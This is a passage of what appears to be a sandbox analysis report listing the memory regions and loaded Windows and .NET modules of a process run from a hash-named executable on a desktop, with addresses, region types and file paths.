filename = "\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe")
Region:
id = 1669
start_va = 0x76d20000
end_va = 0x76ec8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1670
start_va = 0x76f00000
end_va = 0x7707ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1671
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1672
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1673
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1674
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1675
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1676
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1677
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1678
start_va = 0x400000
end_va = 0x437fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1679
start_va = 0x440000
end_va = 0x5bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 1680
start_va = 0x73690000
end_va = 0x736cefff
monitored = 0
entry_point = 0x736be088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1681
start_va = 0x73630000
end_va = 0x7368bfff
monitored = 0
entry_point = 0x7366f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1682
start_va = 0x73620000
end_va = 0x73627fff
monitored = 0
entry_point = 0x736220f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1683
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1684
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1685
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1686
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076b00000"
filename = ""
Region:
id = 1687
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 0
entry_point = 0x76c3a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1688
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076c20000"
filename = ""
Region:
id = 1689
start_va = 0x5c0000
end_va = 0x7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 1690
start_va = 0x73500000
end_va = 0x73549fff
monitored = 1
entry_point = 0x73502e54
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 1691
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1692
start_va = 0x753c0000
end_va = 0x75406fff
monitored = 0
entry_point = 0x753c74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1693
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1694
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1695
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1696
start_va = 0x70000
end_va = 0xd6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1697
start_va = 0x290000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 1698
start_va = 0x7c0000
end_va = 0x92ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 1699
start_va = 0x76a60000
end_va = 0x76afffff
monitored = 0
entry_point = 0x76a749e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1700
start_va = 0x75410000
end_va = 0x754bbfff
monitored = 0
entry_point = 0x7541a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1701
start_va = 0x759a0000
end_va = 0x759b8fff
monitored = 0
entry_point = 0x759a4975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1702
start_va = 0x76970000
end_va = 0x76a5ffff
monitored = 0
entry_point = 0x76980569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1703
start_va = 0x74a50000
end_va = 0x74aaffff
monitored = 0
entry_point = 0x74a6a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1704
start_va = 0x74a40000
end_va = 0x74a4bfff
monitored = 0
entry_point = 0x74a410e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1705
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 1706
start_va = 0x733b0000
end_va = 0x7343cfff
monitored = 1
entry_point = 0x733c2860
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 1708
start_va = 0x734f0000
end_va = 0x734f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 1712
start_va = 0x751c0000
end_va = 0x75216fff
monitored = 0
entry_point = 0x751d9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1713
start_va = 0x75220000
end_va = 0x752affff
monitored = 0
entry_point = 0x75236343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1714
start_va = 0x76860000
end_va = 0x7695ffff
monitored = 0
entry_point = 0x7687b6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1715
start_va = 0x759c0000
end_va = 0x759c9fff
monitored = 0
entry_point = 0x759c36a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 1716
start_va = 0x74d40000
end_va = 0x74ddcfff
monitored = 0
entry_point = 0x74d73fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 1717
start_va = 0xe0000
end_va = 0xfdfff
monitored = 0
entry_point = 0xf158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1718
start_va = 0x930000
end_va = 0xab7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000930000"
filename = ""
Region:
id = 1719
start_va = 0xe0000
end_va = 0xfdfff
monitored = 0
entry_point = 0xf158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1720
start_va = 0x75550000
end_va = 0x755affff
monitored = 0
entry_point = 0x7556158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1721
start_va = 0x74c40000
end_va = 0x74d0bfff
monitored = 0
entry_point = 0x74c4168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1722
start_va = 0xac0000
end_va = 0xc40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ac0000"
filename = ""
Region:
id = 1723
start_va = 0x1440000
end_va = 0x283ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001440000"
filename = ""
Region:
id = 1724
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1725
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1726
start_va = 0x290000
end_va = 0x353fff
monitored = 1
entry_point = 0x354c4e
region_type = mapped_file
name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
filename = "\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe")
Region:
id = 1727
start_va = 0x3b0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003b0000"
filename = ""
Region:
id = 1728
start_va = 0x290000
end_va = 0x353fff
monitored = 1
entry_point = 0x354c4e
region_type = mapped_file
name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
filename = "\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe")
Region:
id = 1729
start_va = 0x733a0000
end_va = 0x733a8fff
monitored = 0
entry_point = 0x733a1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 1730
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1731
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1732
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1733
start_va = 0x73600000
end_va = 0x73613fff
monitored = 0
entry_point = 0x7360ac00
region_type = mapped_file
name = "vcruntime140_clr0400.dll"
filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll")
Region:
id = 1734
start_va = 0x73550000
end_va = 0x735fafff
monitored = 0
entry_point = 0x735e5f20
region_type = mapped_file
name = "ucrtbase_clr0400.dll"
filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll")
Region:
id = 1736
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 1737
start_va = 0x140000
end_va = 0x14ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 1738
start_va = 0x150000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 1739
start_va = 0x160000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 1740
start_va = 0x170000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 1741
start_va = 0x180000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1742
start_va = 0x290000
end_va = 0x29ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 1743
start_va = 0x2a0000
end_va = 0x2a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002a0000"
filename = ""
Region:
id = 1744
start_va = 0x2b0000
end_va = 0x2b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 1745
start_va = 0xc50000
end_va = 0xe6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c50000"
filename = ""
Region:
id = 1746
start_va = 0xe70000
end_va = 0x108ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e70000"
filename = ""
Region:
id = 1747
start_va = 0x4a0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004a0000"
filename = ""
Region:
id = 1748
start_va = 0x540000
end_va = 0x5bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 1749
start_va = 0xd30000
end_va = 0xe2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d30000"
filename = ""
Region:
id = 1750
start_va = 0xe30000
end_va = 0xe6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 1751
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 1752
start_va = 0x2c0000
end_va = 0x2cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1753
start_va = 0x2840000
end_va = 0x483ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 1754
start_va = 0x2c0000
end_va = 0x35ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1755
start_va = 0x620000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 1756
start_va = 0x6c0000
end_va = 0x7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006c0000"
filename = ""
Region:
id = 1757
start_va = 0xf40000
end_va = 0x103ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f40000"
filename = ""
Region:
id = 1758
start_va = 0x1050000
end_va = 0x108ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001050000"
filename = ""
Region:
id = 1759
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 1760
start_va = 0x5e0000
end_va = 0x61ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 1761
start_va = 0x1220000
end_va = 0x131ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001220000"
filename = ""
Region:
id = 1762
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 1772
start_va = 0x4840000
end_va = 0x4b0efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1773
start_va = 0x70360000
end_va = 0x7176afff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll")
Region:
id = 1774
start_va = 0x75740000
end_va = 0x7589bfff
monitored = 0
entry_point = 0x7578ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1775
start_va = 0x73a10000
end_va = 0x73a8ffff
monitored = 0
entry_point = 0x73a237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1776
start_va = 0x4b10000
end_va = 0x4cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b10000"
filename = ""
Region:
id = 1777
start_va = 0x7c0000
end_va = 0x89efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007c0000"
filename = ""
Region:
id = 1778
start_va = 0x8f0000
end_va = 0x92ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008f0000"
filename = ""
Region:
id = 1779
start_va = 0x360000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 1780
start_va = 0x6f900000
end_va = 0x70354fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll")
Region:
id = 1781
start_va = 0x6f5a0000
end_va = 0x6f742fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.drawing.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll")
Region:
id = 1782
start_va = 0x6d250000
end_va = 0x6e0b5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.windows.forms.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll")
Region:
id = 1783
start_va = 0x370000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 1784
start_va = 0x74a10000
end_va = 0x74a12fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-xstate-l2-1-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll")
Region:
id = 1785
start_va = 0x74980000
end_va = 0x74a08fff
monitored = 1
entry_point = 0x74981130
region_type = mapped_file
name = "clrjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")
Region:
id = 1786
start_va = 0x75130000
end_va = 0x751befff
monitored = 0
entry_point = 0x75133fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1787
start_va = 0x380000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 1788
start_va = 0x390000
end_va = 0x39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 1789
start_va = 0x6e0c0000
end_va = 0x6e8d7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll")
Region:
id = 1790
start_va = 0x6f3b0000
end_va = 0x6f591fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "microsoft.visualbasic.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\a891970b44db9e340c3ef3efa95b793c\\Microsoft.VisualBasic.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.v9921e851#\\a891970b44db9e340c3ef3efa95b793c\\microsoft.visualbasic.ni.dll")
Region:
id = 1791
start_va = 0x390000
end_va = 0x39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 1792
start_va = 0x390000
end_va = 0x39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 1793
start_va = 0x7ef50000
end_va = 0x7ef9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef50000"
filename = ""
Region:
id = 1794
start_va = 0x7ef40000
end_va = 0x7ef4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef40000"
filename = ""
Region:
id = 1795
start_va = 0x74960000
end_va = 0x74972fff
monitored = 1
entry_point = 0x7496d900
region_type = mapped_file
name = "nlssorting.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll")
Region:
id = 1796
start_va = 0x4d00000
end_va = 0x4fd1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nlp"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp")
Region:
id = 1797
start_va = 0x390000
end_va = 0x39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 1798
start_va = 0x6f7f0000
end_va = 0x6f8f4fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.configuration.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll")
Region:
id = 1800
start_va = 0x6ec30000
end_va = 0x6f3a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll")
Region:
id = 1801
start_va = 0x75be0000
end_va = 0x76829fff
monitored = 0
entry_point = 0x75c61601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1802
start_va = 0x390000
end_va = 0x390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 1803
start_va = 0x748d0000
end_va = 0x748dafff
monitored = 0
entry_point = 0x748d1992
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 1804
start_va = 0x4fe0000
end_va = 0x520ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fe0000"
filename = ""
Region:
id = 1805
start_va = 0x6f7d0000
end_va = 0x6f7e6fff
monitored = 0
entry_point = 0x6f7d35fa
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 1806
start_va = 0x738e0000
end_va = 0x738f6fff
monitored = 0
entry_point = 0x738e3573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 1807
start_va = 0x3c0000
end_va = 0x3fbfff
monitored = 0
entry_point = 0x3c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1808
start_va = 0x3c0000
end_va = 0x3fbfff
monitored = 0
entry_point = 0x3c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1809
start_va = 0x3c0000
end_va = 0x3fbfff
monitored = 0
entry_point = 0x3c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1810
start_va = 0x3c0000
end_va = 0x3fbfff
monitored = 0
entry_point = 0x3c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1811
start_va = 0x3c0000
end_va = 0x3fbfff
monitored = 0
